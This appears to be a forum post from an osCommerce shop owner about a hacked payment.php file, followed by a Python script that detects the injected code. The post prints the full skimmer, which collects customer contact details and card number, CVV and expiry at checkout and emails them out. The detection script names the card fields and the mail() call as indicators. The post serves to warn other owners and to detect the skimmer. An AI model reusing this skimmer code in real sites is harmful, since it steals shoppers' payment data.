
Includes/classes/payment.php Hacked Last Night


Guest

Recommended Posts

Posted

I am not sure how this happened, but I am looking into it... I suspect a compromised admin password. It is important that others check to ensure that they were not hacked, and I would love feedback from anyone else that might have the same issue.

Sometime yesterday my includes/classes/payment.php file was changed to include this code above the code header:


<?php
$urlz=$_SERVER['REQUEST_URI'];
if (eregi("checkout_confirmation.php", $urlz)) {
$td_query = tep_db_query("select * from " . TABLE_ADDRESS_BOOK . " where customers_id = '" . $customer_id . "'");
  $duong = tep_db_fetch_array($td_query);
	$firstname123=$duong['entry_firstname'];
	$lastname123=$duong['entry_lastname'];
	$street_address123=$duong['entry_street_address'];
	$city123=$duong['entry_city'];
	$zone_id=$duong['entry_zone_id'];
	$statex=$duong['entry_state'];
if(($statex=="")||($statex=="0"))	{
 $td_queryxx = tep_db_query("select * from " . TABLE_ZONES . " where zone_id = '" . $zone_id . "'");
  $duongxx = tep_db_fetch_array($td_queryxx);
$state123 = $duongxx['zone_name'];
}else {$state123=$statex;}
$country=$duong['entry_country_id'];
$td_queryxxx = tep_db_query("select * from " . TABLE_COUNTRIES . " where countries_id = '" . $country . "'");
  $duongxxx = tep_db_fetch_array($td_queryxxx);
$country123 = $duongxxx['countries_name'];
	$postcode123=$duong['entry_postcode'];
	$td_query2 = tep_db_query("select * from " . TABLE_CUSTOMERS . " where customers_id = '" . $customer_id . "'");
	$duong2 = tep_db_fetch_array($td_query2);
		$telephone123=$duong2['customers_telephone'];
	$email_address123=$duong2['customers_email_address'];
$dob123 =	 $duong2['customers_dob'];

$site = "[edited.to.protect.innocent]";
$headers123 = "From:Website $site";
$headers123 .= "<$site>\n";
$headers123 .= "X-Sender: <$site>\n";
$headers123 .= "X-Mailer: PHP\n";
$headers123 .= "Return-Path:<[email protected]>\n";
$headers123 .= "Content-Type:text/html; ";
$headers123 .= "charset=iso-8859-1\n";
$message123 = "Name : $firstname123 $lastname123 <br>";
$message123 .= "Telephone : $telephone123 <br>";
$message123 .= "Email : $email_address123 <br>";
$message123 .= "Street : $street_address123 <br>";
$message123 .= "Postcode : $postcode123 <br>";
$message123 .= "City : $city123 <br>";
$message123 .= "State : $state123 <br>";
$message123 .= "Country : $country123 <br>";
$ccowner123 = $HTTP_POST_VARS['cc_owner'];
$ccnumber123 = $HTTP_POST_VARS['cc_number'];
$tmp1 = $HTTP_POST_VARS['cc_cvmvalue'];
$tmp2 = $HTTP_POST_VARS['cc_expires_month'] . "/" . $HTTP_POST_VARS['cc_expires_year'];
$message123 .= "CC Owner : $ccowner123  <br>";
$message123 .= "CC Number : $ccnumber123 <br>";
$message123 .= "CVV2 :  $tmp1 <br>";
$message123 .= "Date Expire :  $tmp2 <br>";
$message123 .= "Site : http://$site <br>";
if(($ccnumber123!="")&&($tmp1!="")&&($tmp1!="0")){
mail("[email protected]","Cvv - Site $site!",$message123,$headers123);
}
}
/*
 $Id: payment.php,v 1.37 2003/06/09 22:26:32 hpdl Exp $

 osCommerce, Open Source E-Commerce Solutions
 http://www.oscommerce.com

...etc
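A check for the pattern reported above, added here as an example and not part of the post or of osCommerce: it flags a payment.php whose code sits before the `$Id:` header comment (the stock file starts with that comment right after `<?php`, which the post's description assumes), that reads card fields out of the request, and that calls mail(); it also compares the file against a recorded known-good hash. The file contents used below are constructed stubs.

```python
import hashlib
import re

# Request fields the osCommerce credit card module reads (names taken from the post).
CARD_FIELDS = ("cc_owner", "cc_number", "cc_cvmvalue", "cc_expires_month", "cc_expires_year")

def code_before_header(src):
    """Return whatever sits between '<?php' and the '/* $Id: ...' header, or None if no header."""
    m = re.search(r"<\?php(.*?)/\*\s*\$Id:", src, re.S)
    return m.group(1).strip() if m else None

def find_skimmer_indicators(src):
    """List the traits of the injected code from the post that are present in src."""
    indicators = []
    pre = code_before_header(src)
    if pre is None:
        indicators.append("no $Id header comment found")
    elif pre:
        indicators.append("code inserted before $Id header")
    # The stock class never touches raw card fields; the skimmer pulls them from the request.
    fields = sorted(f for f in CARD_FIELDS
                    if re.search(r"\$(?:_POST|HTTP_POST_VARS)\[['\"]" + f, src))
    if fields:
        indicators.append("reads card fields from request: " + ", ".join(fields))
    if re.search(r"\bmail\s*\(", src):
        indicators.append("calls mail()")
    return indicators

def is_suspicious(src):
    """Card fields read from the request plus a mail() call is the skimmer's signature."""
    ind = find_skimmer_indicators(src)
    return any(i.startswith("reads card fields") for i in ind) and "calls mail()" in ind

def sha256_of(src):
    return hashlib.sha256(src.encode()).hexdigest()

def matches_baseline(src, known_sha256):
    """Integrity check against the hash recorded from a known-good copy of the file."""
    return sha256_of(src) == known_sha256

# Constructed sample contents (not real osCommerce source): a clean stub and an infected one.
CLEAN = ("<?php\n/*\n $Id: payment.php,v 1.37 2003/06/09 22:26:32 hpdl Exp $\n*/\n"
         "class payment { }\n")
INFECTED = ("<?php\n$n = $HTTP_POST_VARS['cc_number'];\n$c = $HTTP_POST_VARS['cc_cvmvalue'];\n"
            "if ($n != '') { mail('drop@example.invalid', 'Cvv', $n . $c); }\n" + CLEAN[6:])

if __name__ == "__main__":
    for name, src in (("clean", CLEAN), ("infected", INFECTED)):
        print(name, is_suspicious(src), find_skimmer_indicators(src))
```

Run it against the live includes/classes/payment.php and against a copy from the original distribution; a hash mismatch alone is enough reason to diff the two files.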
